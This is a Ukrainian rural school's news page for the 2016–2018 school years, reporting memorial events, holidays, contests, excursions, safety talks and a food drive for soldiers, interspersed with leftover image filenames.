Новини 2017-2018 н.р.

Чорнобиль – скорбота пам’яті людської…

26 квітня у Білогородському НВК  відзначили День пам`яті  трагедії на ЧАЕС.

На виховному заході «Чорнобиль – скорбота пам’яті людської…»

 вчитель української літератури  Кравчук М.А. згадала про трагедію віку — вибух на ЧАЕС, поглибила  знання учнів про неї, визначила  негативний вплив аварії на стан навколишнього середовища та здоров’я населення.  Учні 7 класу розповіли  про ліквідаторів аварії на Чорнобильській АЕС,  висловили  особисту стурбованість  за все, що відбувається навколо, сприймаючи  чужу біду, чужий біль як власний.  Хвилиною мовчання вшанували пам`ять тих, кого забрала вічність саме через страшне лихо – аварію нас ЧАЕС.

 

Щорічну акцію “За чисте довкілля” у Білогородці розпочато!!!

Матусю, сонечко моє!

Недарма, мабуть, святкуємо ми жіночий день саме навесні. Весна.. Лагідна, загадкова, тендітна.   І саме тому  20  березня у Білогородському НВК відбулися   загальношкільні батьківські збори присвячені  Дню 8 Березня. Всі свої найкращі побажання, пісні, танці, інсценізації  подарували учні  своїм мамам, бабусям  під час  свята  «Матусю, сонечко моє!».  Максимум зусиль та кропіткої праці доклали  вихователі, помічники вихователів, класні керівники та педагог-організатор для   проведення такого чудового, незабутнього святкового концерту.

         “А Сотню  вже зустріли небеса…”                    

А сотню вже зустріли небеса…

Летіли легко, хоч Майдан ридав…

І з кров´ю перемішана сльоза….

А батько сина ще не відпускав..

       Справжні бої розгорталися в центрі Києва 18-20 лютого на вулицях Інститутській, Грушевського, на Європейській площі, майдані, у Маріїнському парку! Навколо вибухи, стогін, горе. До нас прийшла війна. Справжня кровопролитна війна. Нас намагалися винищити за бажання мати людську гідність і самим обирати своє життя. Настав той час, коли кожен українець мав зробити вибір: або ти станеш рабом, або будеш вільною людиною і житимеш у вільній державі. На очах у всього світу влада розстрілювала свій народ. Майдан оточили з усіх боків, взяли у щільне кільце. Та люди не здавалися. Співали Гімн. Зі сцени лунали молитви, патріотичні пісні.

   Хай палають свічки пам’яті загиблих героїв «Небесної Сотні» у наших серцях, а розмірений бій хронометра відчеканить час скорботи, душевного болю і жалю. Нехай пам’ятають про наших героїв, що за волю поклали безцінне життя, що творили історію, наше минуле, у яке вже нема вороття.

    21 лютого   у  Білогородському  НВК  було проведено вчителем історії урок – реквієм до вшанування пам’яті Героїв Небесної Сотні на тему:«А Сотню вже зустріли небеса…» для учнів 1-9 класів.

 

 

                                                                                 

 “Свіча пам’яті ”   

     15 лютого відзначають скорботний День пам’яті воїнів-афганців. Саме в цей день  в Білогородському НВК  було проведено виховний захід “Свіча пам’яті ”, який провела класний керівник  7 класу Кравчук М. А. Вчитель історії Симич Л. М. показала презентації “Роз’ятрені рани Афгану”,  “Час і досі не загоїв рани…” Учні та вчителі вшанували пам’ять тих, хто поліг на афганській землі, дізнаємось про героїв цієї страшної війни. Молоді люди йшли туди не за орденами і медалями. Вони вірили, що виконують інтернаціональний обов’язок.

      “Крути – символ національної честі”

29 січня 1918 року в історії Україні відбулась пам’ятна, однак трагічна подія – 5-годинний бій між 4-тисячним підрозділом російської Червоної гвардії під проводом есера Михайла Муравйова та загоном із київських курсантів і козаків “Вільного козацтва”, що загалом нараховував від 400 до 800 вояків.

На Аскольдовій могилі
Поховали їх –
Тридцять мучнів українців.
Славних, молодих…

   Це слова з вірша Павла Тичини “Пам’яті тридцяти”. Вони присвячені молодим українцям, які загинули у бою під Крутами 29 січня 1918 року. Бою, який обріс легендами. І, попри поразку, став праобразом мужності та відваги для українського народу.

    29 січня в Білогородському  НВК відбулась історична година “Крути – символ національної честі” до 100 – річчя бою під Крутами. Вихованці школи розповідали вірші, ознайомилися із відеострічкою “Бій під Крутами: 100 років”. На завершення учні та вчителі вшанували загиблих юнаків хвилиною мовчання.

“День Соборності України.”

22 січня 1919 року злилися століттями відірвані одна від одної частини єдиної України. Саме тоді на площі перед Київською Софією відбулася подія, про яку мріяли покоління українських патріотів: на велелюдному зібранні було урочисто проголошено злуку Української Народної Республіки і Західноукраїнської Народної Республіки. Виголошення соборницької ідеї стало могутнім виявом творчої енергії нації та прагнення до етнічної і територіальної єдності. Цей день увійшов до національного календаря як велике державне свято – День Соборності України.

       26 роки ми живемо на вільній землі, працюємо на користь незалежної держави, яка має свій Прапор, свій Герб та Гімн.  Про це мріяв, за це боровся наш нескорений народ. Повсякчас пам’ятаймо про незліченні жертви наших співвітчизників, покладені на вівтар незалежності, соборності, державності. Сьогодні їй знову приходиться боротися за свою єдність, волю, правду. Наша держава опинилася сам-на-сам зі складними проблемами, які мусить вирішувати не хто інший, як її народ.

   24 січня в Білогородському  НВК було проведено виховний захід Нехай нерозмежованою залишиться навіки!”, присвячений Дню Соборності України.

   

«Одного разу під Білогородкою …» та  «Танці з 

Результат пошуку зображень для новорічний малюнок

зірками».

28 грудня у Білогородському НВК відбулось Новорічне свято, у якому переплелись два телешоу «Одного разу під Білогородкою …» та «Танці з зірками». Учні 5-9 класів були яскравими учасниками цих дійств. Багато зусиль для підготовки конкурсу «Танці з зірками» доклали класні керівники . З позитивними емоціями всі глядачі залишили свято.  Переможці отримали призи від підприємців: Гаврилюка В. М. та  Газицького В. В.  А піднесеного настрою додали новорічні подарунки  учням 5-9 класів від  місцевого підприємця Михайла Симуника.

  НОВОРІЧНА КАЗКА

З Новорічною казкою учні 1-4 класів та вихованці дитячого садка Білогородського НВК  зустрілись 27 грудня.  Масу задоволення отримали бабусі, мами, татусі та жителі села від дійства, яке організували вчителі, вихователі,  музичний керівник.  Приємно було споглядати за найменшими учасниками – дітьми дошкільного віку.  А новорічним сюрпризом були цукерки від місцевого підприємця Михайла Симуника, за що всі щиро дякують.

Пам`ятаємо, любимо, шануємо…

18 грудня в Білогородському НВК вшанували світлу пам`ять Великої Людини, життєвий шлях якої був злочинно обірваний, перерваний у русі, у невпинному русі на шляху до справжньої, справедливої України. Для В`ячеслава Чорновола Україна була найдорожча. А він для неї. Ми ще не скоро осягнемо, кого втратили. Він не став Президентом України. Але став її національним Героєм – посмертно…

Не стало доброї людини
Шкода, та пам`ятаєм ми її.
Підступна смерть відгризла білі крила,
За Україну кров тече…

Вечорниці та ворожіння на Андрія

За традиціями наших предків, дівчата та хлопці сходилися до однієї хати ввечері 12 грудня. Жартували, оповідали цікаві історії та грали в різні ігри , а в ніч з 12 на 13 грудня ворожили…. Ось і Білогородський НВК  вкотре зібрав гостей у своїй світлиці на традиційні вечорниці. Учні дізналися багато про традиції українського народу, про особливості святкування свята Андрія Первозванного. Не обійшлося  без ворожіння та  кусання смачної “калити”!!

 

Схилімо голови в скорботі…Похожее изображение

24 листопада учні Білогородського НВК  в черговий раз були зібрані для години спілкування  «Схилімо голови в скорботі…», підготовленої  педагогом-організатором Копко Л. І.  Жахливі факти з історії геноциду 1932-1933 років  вразили всіх присутніх. Змістовна презентація  перенесла вихованців  в ці далекі, важкі, голодні роки. Хвилиною мовчання та запаленими  свічечками вшанували пам`ять всіх хто не загинув під час голодного терору.

Ми не залишаємось осторонь…

Учні  та вчителі  Білогородського НВК  взяли активну участь у акції «Ми не залишаємось осторонь… ». У зону АТО зібрали та відправили продукти у такій кількості:

  1. Крупи та макарони – 30 кг.
  2. Часник – 1,5 кг.
  3. Буряк червоний – 30 кг.
  4. Картопля – 115 кг.
  5. Капуста – 10 кг.
  6. Морква – 40 кг.
  7. Цибуля – 11 кг.
  8. М`ясна тушонка – 6 банок.
  9. Гриби – 3 банки.
  10. Овочеві салати та варення – 15 банок.
  11. Сало – 7, 5 кг.
  12. Цукерки – 0,5 кг.
  13. Мівіна – 6 шт.
  14. Чай – 1 п.

 

Україна – країна нескорених!

Обирай Свободу рідному народу!

Обирай Свободу і добро ідей!

Обирай Свободу Заходу і Сходу,

Обирай Свободу для усіх людей!

         Революція відбулася не лише в політичному житті країни. Вона відбулась у нас самих, у нашій свідомості. Адже, Україна – це територія гідності і свободи. Такими нас зробила не одна, а дві революції – наш Майдан 2004 року, який був Святом Свободи, і Революція 2013 року, Революція Гідності. Це був надзвичайно важкий іспит для України, коли українці продемонстрували свою європейськість, гідність, своє прагнення до свободи. Революція Гідності кардинально змінила напрямок розвитку держави та суспільства, згуртувала свідомих, зрілих громадян – справжніх патріотів Батьківщини.

     Минуло чотири  роки із того моменту, як загинули вони – герої, яких народила революція Майдану. Але в першу чергу це стало випробуванням на цінність особистості людини, виміром людської гідності.

     17 листопада  в  Білогородському НВК  відбувся позакласний захід “Україна – країна нескорених!”,  який провела  вчитель історії Симич Л. М.. Вчителі та учні в скорботі й з великою вдячністю згадали  Героїв Небесної сотні та воїнів АТО, котрі відтепер постійно споглядатимуть за нами та нашими вчинками.

    Екскурсія до Тараканівського форту.

 Тараканівський форт або Нова Дубенська фортеця – одне з найцікавіших місць Рівненської області. Його не дарма зараховують до туристичних перлин нашої області. Адже туристів туди так і манить загадковість та незвичайність споруди Тараканівського форту. Про нього ходять легенди. Кажуть, що це місце перетворилося на Місто привидів. Кажуть, примари тут дійсно є. Можливо, це пов`язано з тим, що на початку 20 століття тут загинуло дуже багато солдатів і вони досі не можуть знайти спокій. Багато людей зараховують Нову Дубенську фортецю до числа найбільш містичних місць України.

    6 листопада  у  Білогородському  НВК  було організовано екскурсію до Тараканівського  форту. Діти із захопленням слухали екскурсовода Івана Тимчука.  Під час екскурсії  відвідали чимало цікавих місць форту. Незабутні враження залишилися в учнів та вчителів після цієї поїздки.

 

З Україною в серці…

Результат пошуку зображень для козачата

 Є край, де найкращі у світі пісні
І цвітом чарує калина,
Де сонечко вперше всміхнулось мені
Це дім мій – моя Україна.

  Згадуючи про історію, хіба можна забути про козаків. Хто ж вони такі? На долю козаків випала велика i тяжка праця – бути оборонцями рідної землі від турків та татар. Вони відбивали у них невільників, приймали на себе перші удари ворогів. 

  Саме тому у рамках  свята  «З Україною в серці..»  ми поповнили   наше дитяче об`єднання «Козачата» новими    козачатами. А саме учні першого класу Білогородського НВК 13 жовтня отримали звання козаки та козачки.

Учні початкових класів згадали історію козаччини, розширили свої знання про рідну Україну, її звичаї та традиції. Показали свої вміння і здібності.

Від козаків до кіборгів

Які вони – українські воїни Х, ХVІІ, ХХІ століть? Змінювались обладунки, зброя, воєнні тактики та способи формування військ. Та незмінним залишився волелюбний дух, незламність і здатність до саможертовності, яка дивує увесь світ. Не раз ми воювали і боролись. Переможемо і цього разу. Бо славні справжні герої були завжди і не перевелися досі в Україні.

   13 жовтня в Білогородському  НВК було проведено позакласний захід  в 5 – 9 класах «Від козаків  до кіборгів»  присвячений  до Дня захисника України, які провели класні керівники Кравчук  М. А., та Симич Л. М. Учні ознайомилися із воїнами різних часів. Прозвучали вірші та пісні про АТО. Відбулася зустріч з учасником АТО,  який є вчителем  нашої школи – Круциком Віталієм Володимировичем.

 Вчитель на один день.

Приємний подарунок своїм педагогам у День працівника освіти зробили лідери учнівської ради «Темп» Білогородського НВК – весь навчально – виховний процес взяли у свої руки.

                   

Ще по дорозі до закладу учні радо зустрічали  педагогів,  та підвозили до роботи таксі – «Елітна  тачка» . Біля шкільного порогу   пригощали гарячим смачним чаєм. Після дзвінка  «вчителі» проводили уроки та заняття у навчально – виховному комплексі, які   були  підготовлені на високому рівні.

      

Заключним етапом дня –  вітальна програма «Серце вчителя – чарівний світ бажань і неповторних мелодій…». Для педагогів нашого закладу цей день був незабутнім, неповторним і  чудовим святом.

Память герою

19 вересня у Білогородському НВК  відбулося відкриття меморіальної дошки – нашому земляку, випускнику 1992 року, учаснику АТО,  миротворцю, який виконував завдання в складі миротворчого контингенту  Місії ООН зі стабілізації в Демократичній республіці Конго – Олександру Дворжаку.

   На урочинах з нагоди відкриття були присутні: Голова районної державної адміністрації Юрій Парфенюк, начальник відділу освіти Галина Вознюк, сільський голова Ірина Івашинюта, депутат  Дубенської районної ради Михайло Мілецький, військовослужбовці військової частини А 1519 м.Дубно , родина Дворжаків та  близькі.

   Олександр Дворжак навчався та закінчив Білогородську загальноосвітню школу .  З 1995 року призваний до збройних сил України Дубенським військовим комісаріатом на строкову службу.

Так до 2016 року продовжував свій трудовий шлях на військовій ниві.  

  Брав участь у 2013 році врозмінуванні території колишніх військових складів артилерійської бази у Новобогданівці від вибухонебезпечних предметів.   В серпні-вересні 2014 року брав участь в антитерористичній операції  в підрозділі по інженерному обладнанню вогневих позицій передньої лінії оборони м. Щастя луганська область.

13 вересня 2016 року помер . Смерть пов`язана з виконанням обов`язків військової служби.

Неодноразово отримував нагороди Міністра оборони України .

 

  Олімпійський дух

13 вересня у Білогородському НВК був проведений Олімпійський урок « Олімпійські ігри» з учнями 7класу. На уроці вчитель познайомила їх із загальними відомостями, пов’язаними з міфами та легендами про започаткування Олімпійських ігор, Олімпійської символіки, видатними спортсменами України. Також  з учнями на уроці були проведенні різноманітні конкурси, вікторини, змагання.

 

Ось і 1 вересня на календарі.

Вся шкільна родина зібралася на подвір`ї  Білогородського НВК.

Це чудове свято, яким ми розпочинаємо новий навчальний рік, єднає усі покоління жителів нашого села і нашої країни. День знань став по-справжньому всенародним святом молодості і надій.

         1 вересня 2017 року  розпочалась святкова лінійка, на якій школа привітала першокласників зі вступом у велику шкільну сім`ю. Для малечі це  завжди хвилююча подія. Адже для них розпочнеться цікаве шкільне життя. Для дев`ятикласників цей навчальний рік буде останнім, він прокладе межу між дитинством і дорослим життям.

На святі особливими гостями були вихованці дитячого садка.   Нехай цей 2017-2018 навчальний рік буде  успішним, плідним,  мирним…

Перший урок

1 вересня 2017 року у світлих, відремонтованих з заміненими вікнами  класах учні 1-9 класів  сіли за парти для першого уроку. Кожен класний керівник з великою відповідальністю готувався до уроку.

Учні познайомилися, дізнались багато нового подорожуючи країнами Європейського союзу,  стежками України,  мальовничого рідного села.

День Конституції      

26 – 27 червня у Білогородському НВК  відзначали День Конституції.

Були проведені наступні заходи:

  1. Бібліотечний урок «Вимріяна поколіннями» Грищук Н.С.
  2. Конституція – основний закон моєї держави. Копко Л.І.
  3. «Основа життя – мій закон основний. ..» Бронська Л.О.

   

                                Картинки по запросу останный дзвоник

Прощавай, Букварику, наш найперший друже!

Є святкових днів багато

На листках календаря,

А між ними  –  наше свято

Вшанування  Букваря.

  Учні першого класу прийшовши до школи у вересні, сівши за парти, такі маленькі, дивилися на вчителя і думали,  чого від вас хочуть. Не вміли ні читати, ні писати.

  Але час пройшов і за рік навчилися всього і завершили свою першу книжку «Буквар». Саме тому 22 травня у Білогородському НВК  святкували Свято Букваря.  Вчитель  Гойда Інна Василівна  підготувала з дітьми цікаве та захоплююче свято, батьки за це щиро дякували.

День цивільного захисту

   12 травня 2017 року у Білогородському НВК проведено День цивільного захисту. Головним завданням якого було забезпечення  захисту учасників навчально – виховного процесу від наслідків надзвичайних ситуацій та  перевірка  готовності   до дій за призначенням.

 Метою навчання учнів було  набуття ними практичних навичок поведінки в умовах виникнення надзвичайних ситуацій.

         До участі у Дні ЦЗ було залучено учнів 1-9 класів та весь постійний склад працівників НВК. Участь у дні ЦЗ брали й діти різновікової групи навчального закладу.

 

Подвиг двох поколінь… 

Маки червоні – символ Перемоги,

Ці квіти – кров загиблих на війні.

І матері сіють маки червоні,

На могилках своїх юних синів.

Маки червоні на вітрі палають,

Нам, нагадавши про ті страшні дні,

Маки червоні тихо ридають,

Низько схиливши голівки свої.

   Як тільки вберуться у чарівні білі квіти сади навесні, засвітять дивовижні свічки каштани, а повітрі розіллється тонкий і ніжний аромат, в бузкових кущах заллються піснями невсипущі солов’ї, а вся земля випромінюватиме радість і щастя, нестримну жагу до життя, в такі прекрасні дні, 8-9 травня, ми відзначаємо велике свято – День Пам’яті та Примирення та 72 річницю Дня перемоги над нацизмом у Другій Світовій війні!  

   Це було 72 роки тому. Для нас це історія, але для наших дідусів та бабусь — це частина життя, та найчорніша смуга долі, що й досі озивається у серці смутком і болем.
  Торкнулися  сьогодні тих подій і учні, вчителі, батьки та жителі села  Білогородка,  щоб не забувати, щоб пам’ятати, бо в того народу, що не знає своєї історії, не може бути і майбутнього. Саме тому   9 травня відбувся мітинг-реквієм «Подвиг двох поколінь…» біля пам`ятника загиблим односельчанам на місцевому кладовищі.

 

Поріс чорнобилем Чорнобиль – бідою нашою поріс…

Трагедія  на  Чорнобильській  атомній елекростанції сколихнула весь світ. Радіоактивного забруднення зазнало майже 50 % території України. В життя мільйонів людей увійшли слова «радіація», «зона», «ліквідатор», «відселення».  На квітучий українській землі з’явились пусті міста і села, мертвий ліс, до якого не можна підходити, сади з яблуками, насиченими радіоактивною отрутою, вода, яку не можна пити, і навіть повітря, яким дихаємо, стало ворогом.

  Саме тому 28 квітня  педагог – організатор Білогородського НВК  Копко Л.І.,

 в черговий раз зібрала учнів на загальношкільний   виховний захід

 «Поріс чорнобилем Чорнобиль – бідою нашою поріс…»

Ми раді вітати гостей

25 квітня у Білогородському НВК на чолі з методистом Грогуль Ларисою Миколаївною відбулося засідання  творчої групи вчителів початкових класів. За круглим столом вчителі обговорили  тему засідання «Всебічний розвиток особистості школяра шляхом впровадження компетентнісного підходу у навчально-виховний процес». Відбувся інтегрований урок у 2 класі на тему «У моїх руках краса Землі моєї», який провела  Бабійчук Зоя Миколаївна, і по закінченні якого, зробили висновок, що за використанням такого напрямку у навчальному процесі майбутнє, тому що тільки за таких умов можливе навчання без примусу.

    Піднесенню настрою посприяв дитячий чоловічий консиліум «Чого хочуть жінки».

Зустріч з інспекторами ювенальної превенції сектору превенції Дубенського відділу поліції головного управління Національної поліції в Рівненській області

11 квітня учні Білогородського НВК з цікавістю чекали на зустріч  з капітаном поліції  Вжос  Мирославою Михайлівною та старшим лейтинантом поліції Приходько Сергієм Дмитровичем , які провели лекцію на тему ” Попередження правопорушень серед молодших та середніх підлітків”. Сергій Дмитрович    провів індивідуальну бесіду з хлопцями старшокласниками на тему  “Кримінальна та адміністративна відповідальність неповнолітніх”. Працівниками поліції був проведений інструктаж з безпеки життєдіяльності перед Великодними святами.

 

День благоустрою

8 квітня учні та працівники школи Білогородського НВК з великим інтузіазмом та відповідальністю вийшли на суботник. Територія школи була озеленена та прибрана. До праці долучилися навіть самі маленькі – вихованці садочка. У селі було висаджено “Алею миру”.

Щорічну акцію “За чисте довкілля” у Білогородці розпочато!!!

 

15 березня учні Білогородського НВК долучилися до міжнародного флешмобу  Тризуб-це Україна!!!”

«Весна, кохання, квіти і Ви..» 

07 березня у Білогородському НВК  вихованці  приємно вразили своїх дорогих мам,  бабусь, вчителів  – привітали зі святом 8 березня. Святкова  програма була цікавою, змістовною, насиченою. Інсценізації, гумор, танці, пісні  продемонстровані учнями  дали можливість переконатися батькам, що їх діти в надійних, професійних, творчих руках педагогів.

 markus-amend-foto-1024x1024Обізнані – значить озброєні!

У п’ятницю 3 березня відбулася зустріч з головним інженером                ” Рівнеобленерго” Грищуком Ігорем Олексійовичем, який провів бесіду  з мультимедійним супроводом на тему: ” Запобігання нещасних випадків при користуванні електричним струмом”.

%d1%84%d0%be%d1%82%d0%be-001

 

 

Кохання врятує світ…

6810662-cupid-with-bow-and-arrow-stock-photo

%d0%b8%d0%b7%d0%be%d0%b1%d1%80%d0%b0%d0%b6%d0%b5%d0%bd%d0%b8%d0%b5-1203 %d0%b8%d0%b7%d0%be%d0%b1%d1%80%d0%b0%d0%b6%d0%b5%d0%bd%d0%b8%d0%b5-1208 %d0%b8%d0%b7%d0%be%d0%b1%d1%80%d0%b0%d0%b6%d0%b5%d0%bd%d0%b8%d0%b5-1220

Афганістан  болить в моїй душі…

Минають дні, ідуть роки.

Життя листки перегортає.

А біль Афгану – навіки,

В душі чомусь не замовкає.

15 лютого відзначають скорботний День пам’яті воїнів-афганців. В Білогородському НВК було вшановано пам’ять тих, хто поліг на афганській землі.

Молоді люди йшли туди не за ординами і медалями. Вони вірили, що виконують інтернаціональний обов’язок. Вчитель історії Симич Л.М. провела захід “Афганістан болить в моїй душі”, яким нагадала діткам, що Афганська війна назавжди залишиться болем у серці нашого народу.

%d1%84%d0%be%d1%82%d0%be-001 %d1%84%d0%be%d1%82%d0%be-002 %d1%84%d0%be%d1%82%d0%be-003 %d1%84%d0%be%d1%82%d0%be-004

Під Крутами пішли в безсмертя

Добре кажуть: „Хто не знає свого минулого, не вартий  свого майбутнього”. І це дійсно так, бо так само, як дерево тримається на землі своїми коріннями,так людина тримається на землі своїм минулим. Людина, яка не знає минулого – як  перекотиполе, куди вітер подме, туди воно й котиться. Але ж людина не перекотиполе, і, як сказав у своєму романіПавлоЗагребельний: „На порожньому місці роду не заснуєш”. Саме тому ми повинні знати історію . А історія наша полита кров’ю і сльозами.  Однією із найтрагічніших її сторінок є бій під Крутами.                                         

Супроти чужої навали,

Супротисмерті – в стужу, сніг,

Ось тут вони, ось тут стояли

І всьогожменька – триста їх.

29 січня – День пам’яті героїв Крут – саме там, у 1918 році відбувсябій, що на довгі роки став одним із символів боротьби українськогонароду за свободу і незалежність.

Крути, без сумніву, були, є і будуть завдяки героїзму молодих студентів, однією з героїчних сторінокнашоїісторії.

Саме цим подіям у Білогородському НВК вчитель історії Симич Л. М. 30.01.2017 року провела історичну годину до Дня пам’яті героїв Крут «Квіти у полі, там де Крути…», показала презентацію “Під Крутами пішли в безсмертя».

img_20170130_120017 img_20170130_181823

 Вітаємо з Новим роком!!!

28 та 29 грудня   Білогородський НВК  відвідали  Дід Мороз  та Снігуронька. Всі учні школи з нетерпінням чекали цих гостей. Діти 1-4 класів з класними керівниками приготували костюмований  новорічний ранок «Зимова казка».  Учні 5-9 класів з педагогом-організатором Копко Л.І., провели новорічне шоу «Новорічна катавасія». Свято минуло, а позитивні враження та спогади залишилися надовго. Всі учні  отримали подарунки від  спонсорів:

 ТзОВ  «Дубенський  край»  та сільського голови Ірини  Івашинюти.

%d1%84%d0%be%d1%82%d0%be-004 %d1%84%d0%be%d1%82%d0%be-007 %d1%84%d0%be%d1%82%d0%be-035 %d1%84%d0%be%d1%82%d0%be-038 %d1%84%d0%be%d1%82%d0%be-041

 Миколай завітав до Білогородського НВК

19 грудня у  Білогородський НВК  завітав Миколай. Вчителі початкових класів доклали максимум  зусиль для підготовки свята. Діти   також  з  нетерпінням чекали його приходу, тому підготували для нього в подарунок вірші та пісні. А ще цікаво було подивитися на дійство, яке відбувалося «на небі», де глядачі побачили як Ангели допомагають Миколаєві підготувати дарунки дітям. І наші малята теж отримали від Миколая подарунки – мильні бульбашки.

    %d1%84%d0%be%d1%82%d0%be-005 %d1%84%d0%be%d1%82%d0%be-007 %d1%84%d0%be%d1%82%d0%be-020

Ворожіння на Андрія

Одним із найкраще збережених у народній пам’яті фрагментів духовної культури досі лишаються Андріївські вечорниці. Добре  відомими були дівочі ворожіння про майбутню долю.

    З метою виховання учнів засобами народознавства, прищеплення любові та поваги до українських народних звичаїв та обрядів, поглиблення знань українського фольклору, виховання взаємоповаги, колективізму, створення позитивного психологічного мікроклімату  13 грудня 2016 року  у Білогородському НВК  педагогом-організатором Копко Ларисою Іванівною,  були проведені Андріївські вечорниці. 

    З великим задоволенням юнаки та дівчата згадали  про ворожіння у цей вечір, готування вареників та кусання калити. На вечорницях лунали пісні, жарти та сміх. Свято завершилось, а позитивні емоції залишилися надовго.

%d1%84%d0%be%d1%82%d0%be-017 %d1%84%d0%be%d1%82%d0%be-024 %d1%84%d0%be%d1%82%d0%be-044 %d1%84%d0%be%d1%82%d0%be-059          

Дитині мало прав, їй потрібний достаток

              і виховання,   щоб   ними скористатися.

 О. І. Герцен.

В Білогородському НВК з 05 по 09 грудня проводився тиждень права. Вчитель правознавства Симич Л. М. показала презентацію “Права дитини в Україні”, документальний фільм “Що таке права людини”, провела правові вікторини для 1 – 9 класів  “Права казкових героїв”, ”Мої права”. Класні керівники протягом тижня проводили бесіди на правову тематику. Бібліотекар Грищук Н. С. показала книжкову виставку “Знай свої права”. Проведено конкурс малюнків“Права дитини”. 09 грудня Симич Л. М. провела для учнів 1 – 9 класів всеукраїнський урок права “Права людини починаються з прав дитини”.

img_20161209_115751

Краса врятує світ

У рамках щорічного проекту «Кожен учень – це талановитий скарб»,  2 грудня    у Білогородському НВК пройшов конкурс «Міс школи – 2016».

Грандіозне, цікаве, захоплююче  шоу прийшли подивитися батьки, бабусі, сестрички, братики та просто односельчани. Саме це свято у школі  можна   сміливо вважати   конкурсом  класного керівника, тому що кожен готує своїх  представниць на дуже високому інтелектуальному,   артистичному, акторському рівні. 

Дівчата змагалися у різних конкурсах та вибрати найкращу вельмишановному жюрі було дуже важко. Переможницею та «Міс школи – 2016» стала учениця

8 класу Лідія Братковська. Всі учасниці: Юлія Наконечна, Ільків Ганна, Юлія Окренець, Марія Новак отримали подарунки від сільського голови Ірини Івашинюти та приватного підприємця Гандзилевського Назарія.

%d1%84%d0%be%d1%82%d0%be-004 %d1%84%d0%be%d1%82%d0%be-012 %d1%84%d0%be%d1%82%d0%be-015 %d1%84%d0%be%d1%82%d0%be-030

Міс «Дюймовочка» і містер «Золотий ключик» 

24 листопада в Білогородському НВК відбувся  конкурс краси і грації –   міс «Дюймовочка» і містер «Золотий ключик»  2класу – 2016. Краса  на думку дітей – це гарна зовнішність людини , витончені форми її тіла, гарний одяг, який підкреслює гармонію дивовижного витвору природи і витвору рук людських, вміння  себе подати,талант, розум…

         Наша найповажніша суддівська колегія оцінила красу, оригінальність, розкутість учасників  на сцені, їх таланти, і, до певної міри, ступінь їхнього ораторського мистецтва.
Переможцями стали  Ільчук Ангеліна та Дворжак Богуслав.
Одне можу сказати з упевненістю – всі учасники конкурсу, без винятку, гідні цього звання!
%d0%b8%d0%b7%d0%be%d0%b1%d1%80%d0%b0%d0%b6%d0%b5%d0%bd%d0%b8%d0%b5-002 %d0%b8%d0%b7%d0%be%d0%b1%d1%80%d0%b0%d0%b6%d0%b5%d0%bd%d0%b8%d0%b5-009 %d0%b8%d0%b7%d0%be%d0%b1%d1%80%d0%b0%d0%b6%d0%b5%d0%bd%d0%b8%d0%b5-010

«Страждання, горе, муки мого народу»

Запалила свічку, запалила,

Щоби більше лихо не ходило,

Хай палає свічка світлом білим,

Щоб в бабусі серце не боліло…

Щоби більше не прийшло те горе,

Хай горять свічки Голодомору.

Чуєш – душі аж до неба кличуть!

Хай горять вогненні білі свічі!

24 листопада у Білогородському НВК  учнями  9 класу  та класним керівником Павлюк Тетяною Григорівною  було вшановано пам`ять жертв геноциду Українського народу – Голодомору1932-1933 років.

Голодомор – найбільша трагедія в історії українського народу. До цієї події прикута особлива увага всього людства. Не забувати многостраждальної історії нашого народу; допомогти учням глибше усвідомити значення історичної спадщини про Голодомор  1932 – 1933 років; виробляти вміння самостійно аналізувати  і робити висновки;  виховувати почуття співпереживання, пошани до історичного минулого українського народу  –  мета даного заходу.

%d1%84%d0%be%d1%82%d0%be-006 %d1%84%d0%be%d1%82%d0%be-007

« Хліб у долі моїй і у долі моєї Вкраїни».

З  метою прищеплення  шанобливого  ставлення  до хліба, повагу до людей праці, ознайомлення з минулим свого народу, звичаями нашого краю

18 листопада у Білогородському НВК  відбулося свято « Хліб у долі моїй, і у долі моєї Вкраїни».

У рамках свята відбувся ярмарок-розпродаж хлібобулочних виробів, фруктів, соків. Батьки учнів школи максимально долучились до шкільного дійства, майже кожен учень мав чим торгувати. За це щиро дякують організатори свята.

Діти з великим задоволенням і бажанням продавали всю випічку.  Вилучені кошти підуть на придбання теплих речей військовим  АТО.

%d1%84%d0%be%d1%82%d0%be-007 %d1%84%d0%be%d1%82%d0%be-010 %d1%84%d0%be%d1%82%d0%be-012%d1%84%d0%be%d1%82%d0%be-022%d1%84%d0%be%d1%82%d0%be-024%d1%84%d0%be%d1%82%d0%be-025

16 листопада учні Білогородського НВК  взяли активну участь у вокальному конкурсі «Х – фактор».  З метою виявлення талановитих, обдарованих дітей вчитель музичного мистецтва та класні керівники провели даний конкурс для учнів 3-9 класів. Переможцями конкурсу у молодшій віковій категорії стали:  Лакатош Аліна,  учениця 4 класу – І місце; Ільків Валерія, учениця 3 класу – ІІ місце;  Голік Ангеліна, учениця 3 класу – ІІІ місце. Серед старшої вікової категорії переможцями стали: Митрович Арсен , учень 6 класу – І місце; Свіщ Світлана, учениця 6 класу та Окренець Юлія, учениця 7 класу – ІІ місце; Кузьмич Мирослав, учень 8 класу – ІІІ місце.

%d1%84%d0%be%d1%82%d0%be-044 %d1%84%d0%be%d1%82%d0%be-048 %d1%84%d0%be%d1%82%d0%be-050 %d1%84%d0%be%d1%82%d0%be-053

День української мови та писемності

Слова росли із грунту, мов жито,

Добірним зерном колосилася мова.

Вона як хліб. Вона мені свята.

І кров`ю предків тяжко пурпурова.

Л.Костенко.

 

Нетлінним скарбом століть називають національну мову. Скарбом, що передається від покоління до покоління, об`єднуючи минуле й прийдешнє.

До Дня писемності та мови 10 листопада у Білогородському НВК відбулося свято  «Нетлінний скарб століть…», який провели учні 6 класу з класним керівником Кравчук М.А.  У рамках свята відбувся конкурс читців-декламаторів  віршів про мову.

%d1%84%d0%be%d1%82%d0%be-014 %d1%84%d0%be%d1%82%d0%be-024 %d1%84%d0%be%d1%82%d0%be-025

Радіодиктант

9 листопада Україна  святкує День Української писемності та мови.

З метою пропагування грамотності, підтримки та розвитку державної мови як духовного потенціалу нації, виховання мовної культури учні 5-9 класів Білогородського НВК,  сіли за парти для написання всеукраїнського радіодиктанту «Україна на зламі  тисячоліть…».

%d1%84%d0%be%d1%82%d0%be-004 %d1%84%d0%be%d1%82%d0%be-002 %d1%84%d0%be%d1%82%d0%be-003

Козацькому роду – нема переводу!

У всіх людей одна святиня,

Куди не глянь, де не спитай,

Рідніша їм своя пустиня,

Аніж земний в чужині рай.

Їм красить все їх рідний край.

Нема без кореня рослини,

А нас , людей, без Батьківщини.

